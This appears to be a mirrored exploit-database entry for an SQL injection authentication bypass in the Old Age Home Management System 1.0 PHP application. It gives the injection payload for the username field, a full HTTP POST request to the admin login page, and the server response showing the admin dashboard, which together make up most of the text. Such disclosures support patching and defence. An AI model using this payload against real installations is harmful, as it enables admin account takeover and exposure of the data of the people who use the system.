Exploit for Old Age Home Management 1.0 SQL Injection

Name: Exploit for Old Age Home Management 1.0 SQL Injection
Rating: 5 (158 reviews)
2023-05-01 | CVSS 6.9
## https://sploitus.com/exploit?id=PACKETSTORM:172068
## Title: Old Age Home Management-2022-2023-1.0  
SQLi-Bypass-Authentication-Account-Take-Over  
## Author: nu11secur1ty  
## Date: 04.29.2023  
## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/  
## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette  
## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass  
  
  
## Description:  
The username parameter appears to be vulnerable to SQL injection  
attacks. The payloads nu11secur1ty' or 1=1# or  
nu11secur1ty%27+or+1%3D1%23 were each submitted in the username  
parameter. These two requests resulted in different responses,  
indicating that the input is being incorporated into a SQL query in an  
unsafe way. The attacker easily can take control over the admin  
account and then everything will be lost for this app and the users  
who are using it.  
  
STATUS: CRITICAL  
  
[+]Exploit:  
```MYSQL  
POST /oahms/admin/login.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg  
Content-Length: 62  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/oahms/admin/login.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=  
```  
[+]Responce:  
```HTTP  
HTTP/1.1 200 OK  
Date: Sat, 29 Apr 2023 05:32:07 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0  
Content-Security-Policy: upgrade-insecure-requests;  
X-Powered-By: PHP/8.2.0  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 13518  
  
<!DOCTYPE html>  
<html lang="en">  
  
<head>  
  
<title>Old Age Home Management System|| Dashboard</title>  
<!-- base:css -->  
<link rel="stylesheet" href="vendors/typicons/typicons.css">  
<link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">  
<link rel="stylesheet" href="css/vertical-layout-light/style.css">  
<!-- endinject -->  
  
</head>  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)  
  
## Proof and Exploit  
[href](https://streamable.com/qtj0bz)  
  
## Time spend:  
00:30:00